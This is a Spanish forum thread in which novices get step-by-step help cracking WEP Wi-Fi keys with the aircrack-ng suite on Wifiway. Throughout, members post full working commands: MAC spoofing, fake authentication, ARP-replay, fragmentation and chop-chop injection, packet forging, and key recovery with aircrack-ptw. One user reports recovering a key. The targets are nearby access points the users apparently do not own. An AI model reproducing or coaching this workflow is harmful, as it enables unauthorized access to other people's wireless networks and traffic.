Ayuda novato con Wifiway 6 y zydas

[takoldc]

Valeeeee ChimoC no meteliiio ,entendido, en un terminal esto:

aireplay-ng -1 -e WLAN_XX -b XX:XX:XX:XX:XX:XX  -h 00:11:22:33:44:55 eth2

y en otro terminal esto otro:

aireplay-ng -3 -b XX:XX:XX:XX:XX:XX  -h 00:11:22:33:44:55 eth2

esta noche lo pruebo.

Gracias por la paciencia para con los novatisimos

[takoldc]

Os cuento, intente probar:

aireplay-ng -1 -e WLAN_XX -b XX:XX:XX:XX:XX:XX  -h 00:11:22:33:44:55 eth2

y me sale lo siguiente: Invalid reauthentication delay or missing value. [>=0]

y con el otro comando del ataque 3 ningún problema, claro esta que no tenia ningún cliente y no pude hacer lo ke me dijo keko....

Por otro lado siempre es más recomendable que si existe un cliente real utilizando la red, copiar su mac directamente, poniendo:
aireplay-ng -3 -b XX:XX:XX:XX:XX:XX  -h mac_del_cliente_real eth2
y sin necesidad de autentificación (o sea el aireplay-ng -1... no sería necesario, con lo que en teoría va todo más rápido).

[ChimoC]

Hola takold:

Tus comandos

aireplay-ng -1 -e WLAN_XX -b XX:XX:XX:XX:XX:XX  -h 00:11:22:33:44:55 eth2

Detrás del -1 y entre el -e te falta algoooooo

Y ya te mande un privado para que te dieses cuenta que el -b en el A1 es un -a

Mira TU post de ayer de las 16:54:33

Un saludo

ChimoC

[takoldc]

Joer, he vuelto a releer y me he dao cuenta de la liada que me había hecho.
Ya me he aclarado...Al lanzar airodump-ng me salen todas las redes que hay ami alrededor ...WEP; WAP; etc, etc, etc...localizo las WEP y miro haber si tiene alguna de ellas algun cliente asociado, que hay alguna con cliente lanzo el ataque -3 con la mac del socio osease asin:
 
aireplay-ng -3 -b XX:XX:XX:XX:XX:XX  -h mac_del_cliente_real eth2

y nos olvidamos del ataque -1.
Que no hay socio, pues lanzo el -1 para asociarme osease asin:

aireplay-ng -1 0 -e WLAN_XX -a XX:XX:XX:XX:XX:XX -h 00:11:22:33:44:55 eth2

y nos sale esto (OJO solo cuando esta asociado):
12:14:06  Sending Authentication Request
12:14:06  Authentication successful
12:14:06  Sending Association Request
12:14:07  Association successful :-)
wifiway:~#

y después lanzo el ataque -3:

aireplay-ng -3 -b XX:XX:XX:XX:XX:XX  -h 00:11:22:33:44:55 eth2

 ???Pero ahí vienen mis dudas, por que cuando hago lo de -1+-3
se tira un montón de rato y los #datas ni se mueven, es mas en el -3 le cuesta mucho asta que enpiezan a moverse los ARP y una vez se mueven, al ratito, sale como una pregunta algo sobre la asociación creo que es.
Mi pregunta es ¿que se puede hacer si falla lo anterior expuesto? como es mi caso.

Espero no aburriros con mis letanias y preguntas de novatisimo SALU2 p'a todos.
otra preguntita ¿se puede rompre el protocolo Wap? :
Hay va un enlace a ver que os parece

Parte 1: http://www.hacktimes.com/?q=node/34

Parte 2: http://www.hacktimes.com/?q=node/35

[KeKo]

Pues puedes probar otros ataques en lugar del -3.
A mi me va muy bien el de fragmentación últimamente con la zydas.
Hay documentación aquí: http://www.aircrack-ng.org/doku.php?id=ataque_de_fragmentacion

En esencia es lo siguiente:
lanzar el ataque -5:

aireplay-ng -5 -b XX:XX:XX:XX:XX:XX -h 00:11:22:33:44:55 eth2

(igual que con el ataque -3, si hay un cliente real es mejor utilizar su MAC en lugar de 00:11:22:33:44:55)
(con XX:XX:XX:XX:XX:XX me refiero siempre a la mac del ap, o sea al bssid de la red que te interesa)

Cuando pregunte: "Use this packet ?" le das "y" (yes)
Si todo sale bien, tras un rato (que puede ser largo) obtendrás algo como esto:
 
Got RELAYED packet!!
 Thats our ARP packet!
 Saving keystream in fragment-1234-123456.xor
 Now you can build a packet with packetforge-ng out of that 1500 bytes keystream

y se te creará un archivo con un nombre parecido a fragment-1234-123456.xor (digo parecido porque los números cambian)

Luego escribes:

packetforge-ng -0 -a XX:XX:XX:XX:XX:XX -h 00:11:22:33:44:55 -k 255.255.255.255 -l 255.255.255.255 -y fragment-1234-123456.xor -w nombre.cap

Esto te creará un fichero llamado "nombre.cap" (puedes poner el nombre que quieras, claro)
(por supuesto no debes poner fragment-1234-123456.xor tal cual, sino el que te haya creado a tí el aireplay-ng, que tendrá otros números, esto es sólo un ejemplo)

Y por último:

aireplay-ng -2 -r nombre.cap eth2

y cuando te pregunte, le das "y" otra vez.

Si todo ha ido bien, los #Data de la pantalla en la que tengas el airodump-ng deberían empezar a subir rápidamente.


También tienes el ataque chop-chop que es bastante parecido. De hecho sólo cambia que en lugar de:

aireplay-ng -5 -b XX:XX:XX:XX:XX:XX -h 00:11:22:33:44:55 eth2

es

aireplay-ng -4 -a XX:XX:XX:XX:XX:XX -h 00:11:22:33:44:55 eth2

y que el fichero que crea en lugar de "fragment..." se llama "replay_dec..", es decir, algo como "replay_dec-1234-123456.xor".
El resto es igual.

A mi me va mejor el ataque -5, pero es cuestión de probar.

Sobre el WPA, es muuuy difícil. De hecho si la clave que utiliza es buena, casi se podría decir que imposible, ya que el ataque es por fuerza bruta y depende del diccionario.
Además conseguir un handshake tampoco es moco de pavo, y en este caso es totalmente imprescindible que exista un cliente real.
Yo me dedicaría a las WEP 

EDITO: Se me olvidaba. Eso que dices de que en el ataque -3 te sale como una pregunta, algo sobre la asociación, creo que lo que pasa es que el AP te está desautentificando. Hay algunos APs que necesitan que te autentifiques cada poco tiempo. Esto se arregla cambiando el "0" por otro número en la autentificación. Con eso le dices cada cuantos segundos quieres que envíe un mensaje al AP indicándole que sigue autentificado, para que no te eche.
O sea, en lugar de:

aireplay-ng -1 0 -e WLAN_XX -a XX:XX:XX:XX:XX:XX -h 00:11:22:33:44:55 eth2

prueba a usar:

aireplay-ng -1 30 -e WLAN_XX -a XX:XX:XX:XX:XX:XX -h 00:11:22:33:44:55 eth2

Verás que después de esto:
12:14:06  Sending Authentication Request
12:14:06  Authentication successful
12:14:06  Sending Association Request
12:14:07  Association successful :-)
En lugar de pararse, cada 30 segundos envía otro mensaje y así se mantiene autentificado.

[takoldc]

Muchas gracias KeKo por la información este finde lo pruebo y te comento como ha ido la faena.
SALU2

[alvarogemelo]

Bueno esto es como hice yo, empiezo asi :
1º airodump-ng eth2   para ver las redes
2º lanzo el ataque -5   aireplay-ng -5 -b XX:XX:XX:XX:XX:XX -h 00:11:22:33:44:55 eth2
las xx pongo el bssid de la red que quiero captar pero la MAC es poner lo mismo que el Bssid o donde pone la MAC? hay que poner la que quiero captar verdad?
Bueno hice eso y me estuvo leyendo 30.000packets pero me canse de esperar ya que no me decia nada de
Got RELAYED packet!!
 Thats our ARP packet!
 Saving keystream in fragment-1234-123456.xor
 Now you can build a packet with packetforge-ng out of that 1500 bytes keystream
Asi que pense que algo mal havia hecho
A ver si me podeis ayudar,haciendo el ataque 5 ya no hace falta hacer el 3 no?
thanks

[KeKo]

Lo que está mal es que has utilizado "-h 00:11:22:33:44:55" sin estar asociado.
O bien pones "-h" seguido de un cliente real (que esté utilizando la red en ese momento), o bien te asocias con el ataque -1 y luego utilizas la 00:11:22:33:44:55 o la que sea que hayas utilizado para asociarte.
Resumiendo:
1º airodump-ng eth2  para ver las redes

-Si existe un cliente real:
2º lanzo el ataque -5   aireplay-ng -5 -b XX:XX:XX:XX:XX:XX -h mac_del_cliente_real eth2

-Si no existe:
2º aireplay-ng -1 30 -e nombredelared -a XX:XX:XX:XX:XX:XX -h 00:11:22:33:44:55 eth2
3º lanzo el ataque -5   aireplay-ng -5 -b XX:XX:XX:XX:XX:XX -h 00:11:22:33:44:55 eth2

Y os vuelvo a recordar que 00:11:22:33:44:55 es sólo un ejemplo! No teneis por qué utilizar esa mac, podeis utilizar cualquiera que os inventeis e incluso sería aconsejable que utilizarais otra, ya que 00:11:22:33:44:55 es evidente que es falsa.

[alvarogemelo]

pero como se si esta asociado un cliente real? 1º airodump-ng eth2
hay veo las redes y abajo es donde pone que esta asociado o como? es que me lio aqui  aireplay-ng -5 -b XX:XX:XX:XX:XX:XX -h mac_del_cliente_real eth2(las XX son las Bssid? entonces la Mac cual es,es la misma?
sorry por mi ignorancia

[KeKo]

Tienes que leer la documentación del aircrack-ng. Ahí te explica todo eso.
Por ejemplo: http://www.aircrack-ng.org/doku.php?id=airodump-ng.es
Ahí tienes explicadas todas las cosas que te salen al hacer un airodump-ng.
En el ejemplo que ponen se ve que no hay clientes reales asociados a la red llamada NETGEAR, pero sí hay 2 clientes reales asociados a la red llamada "bigbear", por que abajo sale el bssid de esa red al lado de la mac del cliente, con lo que ese cliente está asociado a esa red y podemos utilizar su mac con la opción "-h" en cualquiera de los ataques -3, -4 o -5 sin necesidad de hacer el -1.
Si quisiéramos atacar la NETGEAR, como no tiene clientes reales, sí sería necesario hacer una asociación falsa (el aireplay-ng -1 ....... )

[alvarogemelo]

cuantos paquetes hay que capturar para que te diga
Got RELAYED packet!!
 Thats our ARP packet!
 Saving keystream in fragment-1234-123456.xor   ?

llevo una hora capturando y coji 30.000 paquetes pero no me dice eso,cuantos son necesarios?

[Guerrero nº13]

A ver Alvaro,me pides que te conteste en privado,pero mejor lo hago por aqui por si le vale a alguien. Te voy a decir como lo he hecho yo,aunque te voy a decir lo mismo que he leído en este foro y que ya te han dicho muchas veces, pero si te vale ahí va:
1-Abres una consola y haces: iwconfig para ver donde tienes tu zydas(eth1 eth0 ...)
2-bajas la interface cambias la mac por una falsa y la subes de nuevo,como ya sabes(ifconfig,macchanger...)
3-lanzas el airodump para ver los ap y los asociados
4-en mi caso no había asociados así que apunta el bssid,el essid y el canal de un ap que te llegue con fuerza, y con control+c paras el airodump
5-todavía en la misma consola haces: iwconfig eth(el que sea) mode monitor channel(el que sea) rate 1M
6-lanzas el airodump pero al que has elegido: airodump-ng eth(el que sea) -c(el que sea) --bssid (mac del ap) -w (un nombre para el archivo de capturas)
7- en otra consola lanzas el A1 para asociarte: aireplay-ng -1 30 -e (nobre del ap) -a (mac del ap) -h (mac falsa) eth(el que sea). Lo de -1 30 es para que te esté continuamente asociando,cosa que habrás de vigilar porque si se desasocia le tendrás que dar de nuevo.
8-abres otra consola y lanzas el A3: aireplay-ng -3 -b (mac del ap) -h (mac falsa) eth(el que sea)
9-con esto y vigilando alternando entre las consolas,y dándole cada vez que se desasocie(es decir cuando pare de trabajar y te aparezca el cursor,vuelves a escribir lo mismo y le das),tendría que ser suficiente. Vigilas que los arp vayan subiendo y cuando lleve unos 50000, ejecutas en otra consola un ls para asegurarte que el archivo que estas grabando .cap está ahí, y ejecutas el aircrack-ptw (nombre del archivo.cap)

Lo de vigilar el paso de la asociación fué porque en mi caso aunque sí autentificaba,se me desasociaba cada dos por tres, no se si es normal pero igual te pasa,así que le vas dando y te suben a rachas de 1000 pero suben. Fue un poco lento(una media hora para los 50000). Mientras que cuando hay cliente creo que te puedes saltar este paso y lanzar un A3 con la mac del cliente y lo tienes en 5 min.
También utilicé el A5 de fragmentación: aireplay-ng -5 -b (mac del ap) -h (mac falsa) eth(el que sea), que ya te han explicado como es y acelera mucho el proceso.

Pero para mí lo más importante era que se desasociaba y como no estes pendiente para ejecutar de nuevo el A1 te puedes morir esperando.

Pd. Yo soy más novato que tú, porque ayer desencripte mi primera red con resultado positivo y comprobado, así que todas las rectificaciones que me hagan los que saben de esto ya sabes a apuntarlas y a cambiarlas. Y ya verás como con paciencia lo sacas
Pd.2. Perdonar si mi lenguaje es de pardillo, pero es que llevo 1 semana en esto. Gracias a todos

[takoldc]

tioooossss!!!!! LO HE CONSEGUIDO

Me costo mucho y haciendo mogollón de pruebas, pero por fin FUND KEY.
Os cuento:
1: iwconfig
2: macchanger -m (mac falso)
3: airodump-ng eth2
4: airodump-ng -c 6 -w (nombre archivo) eth2
     me di cuenta que el AP que quería atacar estaba asociado, por lo que fue facil,
     simplemente lance el ataque -3 con el -h(BSSID o mac del asociado al AP)
5: aireplay-ng -3 -b(mac del AP) -h(mac del AP asociado) eth2

    Por fin enmpezaron a subir los #Data en 2 horas consegui 2800000 +ó - y       #-S oscilaban entre 300 y 380 (no se lo que significa)

6: aircrack-ptw (nombre del archivo)-01.cap
    YYYYYYYY por finnnnnnnn el tan deseado FUND KEY!!!!!!!!!


seguiré probando los siguientes ataques, con los demás me cuesta que suban los #Data, ni se mueben, seguiremos intentandolo, OS CONTARE,


MUCHAS GRACIAS .........

[alvarogemelo]

1-Abro una consola y pongo: iwconfig  y veo donde tengo mi zydas(eth2)

2-bajo la interface ( ifconfig eth2 down)
cambio la mac por una falsa (macchanger --mac=00:11:22:33:44:55 eth2)
la subo de nuevo (ifconfig eth2 up)

3-lanzo el airodump para ver los ap y los asociados-->  airodump-ng eth2

4-sino hay asociados  apunto el bssid,el essid y el canal de un ap que me llega con fuerza, y con control+c paro el airodump

5-todavía en la misma consola hacgo: iwconfig eth2 mode monitor channel(el que sea) rate 1M-->AQUI PONGO CHANNEL11 O CHANNEL 11;ES DECIR,DEJO ESPACIO?CON EL RATE 1M LO PONGO JUNTO O SEPARADO POR ESPACIO?

6-lanzo el airodump que e elegido: airodump-ng eth2 -c(el que sea) --bssid (mac del ap) -w (un nombre para el archivo de capturas)-->AQUI ME QUEDO ESTANCADO CON ESTE COMADNO PORQUE DESPUES DEL -c QUE DEBO PONER? , PONGO LUEGO DE .c EL FRAGMENTO DE COMANDO COMO PONE --bssid (mac del ap)? ES QUE ME DA ERRO ESTE COMANDO A VER SI EM PONEIS UN EJEMPLO ESCRITO EN ESTE COMANDO

7- en otra consola lanzas el A1 para asociarte: aireplay-ng -1 30 -e (nobre del ap) -a (mac del ap) -h (mac falsa) eth2--> SE ME DESASOCIADO A VECES Y VUELVO A ASOCIARLO CON EL MISMO COMANDO,LA MAC FALSA ES 00:11:22:33:44:55 QUE ES MI MAC DEL ETH2 O TENGO QUE PONER XX:XX:XX:XX:XX:XX?

8-abres otra consola y lanzas el A3: aireplay-ng -3 -b (mac del ap) -h (mac falsa) eth2-->AQUI ME SUBEN LOS PAKETES PERO NO LOS ARP,PORQUE?


Bueno hasta aqui llegue a ver si me ayudais a consegurilo
muchas gracias por decirme los pasos

[the_often]

5-todavía en la misma consola hacgo: iwconfig eth2 mode monitor channel(el que sea) rate 1M-->AQUI PONGO CHANNEL11 O CHANNEL 11;ES DECIR,DEJO ESPACIO?CON EL RATE 1M LO PONGO JUNTO O SEPARADO POR ESPACIO?

Con un espacio.

Para el resto de dudas sobre comandos, te recomiendo que VEAS los videos sobre wifislax y wifiway, y que leas los manuales de aircrack de la web de seguridadwireless.net, y AHÏ TIENES TODO FENOMENALMENTE  EXPLICADO.


8-abres otra consola y lanzas el A3: aireplay-ng -3 -b (mac del ap) -h (mac falsa) eth2-->AQUI ME SUBEN LOS PAKETES PERO NO LOS ARP,PORQUE?

Que no te suben los ARPs??  Lee la chincheta de ATAQUES SIN CLIENTES del subforo de Wifislax anda.

Bueno hasta aqui llegue a ver si me ayudais a consegurilo
muchas gracias por decirme los pasos

Tienes que leer un poquitin mas.  Ya te queda poco pa conseguirlo.

[ChimoC]

6-lanzo el airodump que e elegido: airodump-ng eth2 -c(el que sea) --bssid (mac del ap) -w (un nombre para el archivo de capturas)-->AQUI ME QUEDO ESTANCADO CON ESTE COMADNO PORQUE DESPUES DEL -c QUE DEBO PONER? , PONGO LUEGO DE .c EL FRAGMENTO DE COMANDO COMO PONE --bssid (mac del ap)? ES QUE ME DA ERRO ESTE COMANDO A VER SI EM PONEIS UN EJEMPLO ESCRITO EN ESTE COMANDO

airodump-ng -c CANAL –bssid MAC_BSSID -w NOMBRE_ARCHIVO eth0

muchas gracias por decirme los pasos

Un saludo

ChimoC

[takoldc]

compañeros ya se lo que es: #/s   Número de paquetes de datos capturados por segundo calculando la media de los últimos 10 segundos.

[alvarogemelo]

si al hacer airodump-ng eth1 la red wep que quieres sacar la clave no suben los Data es que no se puede sacar la clave porque no hay buena señal o no tiene nada que ver?
es que no me suben los data pero si lee packetes y muchisimos,que hago?

[Guerrero nº13]

Yo creo que no tiene nada que ver. Esos datas empezaran a subir a medida que empieces a conseguir arps. La señal viene determinada por el pwr(power). En mi caso con 20 o 25 he podido hacerlo bien

[alvarogemelo]

el power no me llega a 20 pero los ARP no se mueben no suben y los data tampoco en cambio los Beacons y los packets suben a toda hostia,sigo esperando o pasa algo raro?
en la asociacio la puse con 0 y me dio esto
waiting for beacom frame (bssid : xxxxxxx) se enlazo bien ?

[hadrianweb]

Lo importante son los datas, los beacons creo que son lo que tu envias, sin embrago lo importante es lo que inyecte que seran los datas

[alvarogemelo]

pues entonces no em inyecta la zydas porque los data no suben y los arp tampoco, que puedo haver hecho mal si e seguido tu minituto guerrero13

[Guerrero nº13]

Pues la verdad es que no se que decirte,recuerda que soy un novato de mucho cuidao. Solo se me ocurre que estes muy lejos del ap,porque he leído que si el pwr está por debajo de 10,mal asunto. O que no te deje asociarte,recuerda vigilar esa consola porque a mi me autentificaba pero solo me asociaba de vez en cuando,momento en que subían los arp,y luego se volvían a parar, por lo que volvía a mandar el Ataque1 de nuevo. Te recomiendo que vayas a casa de algún amigo y que lo hagas allí,con el ap cerca y con él asociado a su ap, y tú al lado a ver si así lo consigues

[takoldc]

Aquí tenéis el significado de los campos que muestra el airodump-ng.

Las MACs expuestas NO son reales. Son un ejemplo.

 CH  9 ][ Elapsed: 4 s ][ 2007-02-25 16:47
                                                                                                           
  BSSID                   PWR   RXQ    Beacons    #Data, #/s   CH  MB  ENC  CIPHER  AUTH  ESSID
                                                                                                           
 00:09:5B:30:F2:5K    11       16       10              0    0     11   54. OPN                       NETGEAR                         
 00:14:6C:7Y:5ñ:O3   34      100       57             14    1      9   11  WEP    WEP             bigbear                           
                                                                                                           
BSSID                                STATION            PWR  Lost  Packets  Probes                                             
                                                                                                            
 00:14:6C:7Y:5ñ:O3        00:0F:B5:P0:L0:N3     51      2       14
 (not associated)             00:14:A4:T5:E8:94    19       0        4        mossy
 00:14:6C:7Y:5ñ:O3         00:0C:41:AA:15:J3    -1        0        5

Campo                                         Descripción

BSSID         Dirección MAC del punto de acceso.

PWR    Nivel de señal. Su significado depende del driver que usemos, pero cuanto mayor sea el PWR más cerca estaremos del AP o del cliente. Si el PWR es -1, significa que el driver no soporta la detección del nivel de señal. Si el PWR es -1 para algunos clientes (stations) es porque los paquetes proceden del AP hacia el cliente pero las transmisiones del cliente se encuentran fuera del rango de cobertura de tu tarjeta. Lo que significa que solo escuchas la mitad de la comunicación. Si todos los clientes tienen PWR -1 significa que el driver no tiene la cpacidad de detectar el nivel de señal.

RXQ   Calidad de recepción calculada a través del porcentaje de paquetes (management y paquetes de datos) recividos correctamente en los últimos 10 segundos. Mira la nota para una explicación más detallada.

Beacons   Número de “paquetes anucio” o beacons enviadas por el AP. Cada punto de acceso envia alrededor de diez beacons por segundo cuando el rate o velocidad es de 1M, (la más baja) de tal forma que se pueden recibir desde muy lejos.

# Data   Número de paquetes de datos capturados (si tiene clave WEP, equivale tambien al número de IVs), incluyendo paquetes de datos broadcast (dirigidos a todos los clientes).

#/s   Número de paquetes de datos capturados por segundo calculando la media de los últimos 10 segundos.

CH   Número de canal (obtenido de los “paquetes anuncio” o beacons).
Nota: Algunas veces se capturan paquetes de otros canales, incluso si airodump-ng no está saltando de canal en canal, debido a interferencias o solapamientos en la señal.

MB   Velocidad máxima soportada por el AP. Si MB = 11, es 802.11b, si MB = 22es 802.11b+ y velocidades mayores son 802.11g. El punto (despues del 54) indica que esa red soporta un preámbulo corto o “short preamble”.
ENC   Algoritmo de encriptación que se usa. OPN = no existe encriptación (abierta),”WEP?” = WEP u otra (no se han capturado suficientes paquetes de datos para saber si es WEP o WPA/WPA2), WEP (sin el interrogante) indica WEP estática o dinámica, y WPA o WPA2 en el caso de que se use TKIP o CCMP.

CIPHER   Detector cipher. Puede ser CCMP, WRAP, TKIP, WEP, WEP40, o WEP104.

AUTH   El protocolo de autenticación usado. Puede ser MGT, PSK (clave precompartida), o OPN (abierta).

ESSID   Tambien llamado “SSID”, que puede estar en blanco si la ocultación del SSID está activada en el AP. En este caso, airodump-ng intentará averiguar el SSID analizando paquetes “probe responses” y “association requests” (son paquetes enviados desde un cliente al AP).

STATION   Dirección MAC de cada cliente asociado. En la captura de pantalla, vemos que se han detectado dos clientes (00:0F:B5:P0:L0:N3 y 00:0C:41:AA:15:J3).

Lost   El número de paquetes perdidos en los últimos 10 segundos.

Packets   El número de paquetes de datos enviados por el cliente.

Probes   Los ESSIDs a los cuales ha intentado conectarse el cliente.


EDITO

Las MACs que estan reflejadas en lo anteriormente expuesto no son reales y no pertenecen a ningún AP real. Son un mero ejemplo.
 

[Guerrero nº13]

a ver si me aclaro. por seguir el ejemplo de tu captura de pantalla, el cliente con mac 00:14:a4:3f:82:13 intenta asociarse a mossy y no lo consigue(not associated), o está asociado pero mossy está fuera de tu cobertura(por eso no sale en la parte de arriba) y el cliente sí está dentro de tu cobertura.
Es que me a mi me sale exactamente igual y tengo esa duda

[the_often]

Buen la explicacion de los parametros del airodump.

Solo una cosilla, espero que las MACs no sean reales. Si lo son es mejor que las cambies.

pues entonces no em inyecta la zydas porque los data no suben y los arp tampoco, que puedo haver hecho mal si e seguido tu minituto guerrero13

Para alvarogemelo:  Estas haciendo un atake sin clientes. Ya se te ha contestado varias veces a lo mismo.  Agradeceria que dejaras de preguntar "Por que no me suben los ARPs?" y te leyeras la chincheta de Atakes sin clientes como ya te dije e un post anterior, que para eso la hemos hecho.  Porque es que ultimamente eso se ha preguntado mil veces.

Espero que sepas leer.....  lo digo porque de momento no me has hecho caso....


Un saludo

[alvarogemelo]

si que me e leido la chincheta de ataque sin cliente, hago el ataque A1 + A3 pero nada no suben los ARP pero lo que no entiendo es ir filtrando por canal y BSSID correspondiente a nuestra red-->COMO FILTRO POR CANAL Y BSSID DE MI RED COMO LO METO EN EL COMANDO A EJECUTAR DEL AIREPLAY?
es que al hacer el airodump-ng eth1 que me salen las redes creo que me lio al asociar,si la red que quiero asociarme no hay nadie asociado porque lo pondria en el STATION entonces lo asocio con el A1 y a la vez el A3,es asi?
pues no me suben los ARP no se si sera porque esta lejos la red que quiero descifrar

[uNbAs]

Yo lo q no entiendo es que teniendo la traduccion de aircrack-ng q hizo thefkboos en su dia ... hagais un post esplicando lo mismo q hemos explicado mil veces en los manuales ...

Esto pasa por q sois unos prisas .... hay q pararse a leer un poco por q nadie ha nacido aprendido, pero aun asi sigo sin entender .... por q no se leen los manuales

[the_often]

si que me e leido la chincheta de ataque sin cliente, hago el ataque A1 + A3 pero nada no suben los ARP pero lo que no entiendo es ir filtrando por canal y BSSID correspondiente a nuestra red-->COMO FILTRO POR CANAL Y BSSID DE MI RED COMO LO METO EN EL COMANDO A EJECUTAR DEL AIREPLAY?

Para filtrar por canal y BSSID se hace con el airodump, no con el aireplay.

En los manuales de la web de hwagm tienes muy bien explicados todos los atakes, y parametros de uso del airodump y aircrack.  Entre esos manuales se encuentra la fenomenal traduccion hecha por thefckboss.

es que al hacer el airodump-ng eth1 que me salen las redes creo que me lio al asociar,si la red que quiero asociarme no hay nadie asociado porque lo pondria en el STATION entonces lo asocio con el A1 y a la vez el A3,es asi?

Sí, es asi,  pero es mucho mejor que filtres por canal y BSSID.

Yo lo q no entiendo es que teniendo la traduccion de aircrack-ng q hizo thefkboos en su dia ... hagais un post esplicando lo mismo q hemos explicado mil veces en los manuales ...

Unbas no se si esto lo dices por la chincheta de atakes sin clientes. Espero que no.  En cualquier caso espero que no te molestara que la pusiese, la hice para que la gente la tenga a mano en el foro y deje de preguntar tantas veces lo mismo.

UN SALUDO

[alvarogemelo]

y cual es el comando para filtrar por canal y bssid que no lo encuentro?asi podre asociar e inyectar para conseguir las datas?
no se cual es la web de hwagm ni donde encontrar esos manuales si fueses tan amable de ponerme el link
gracias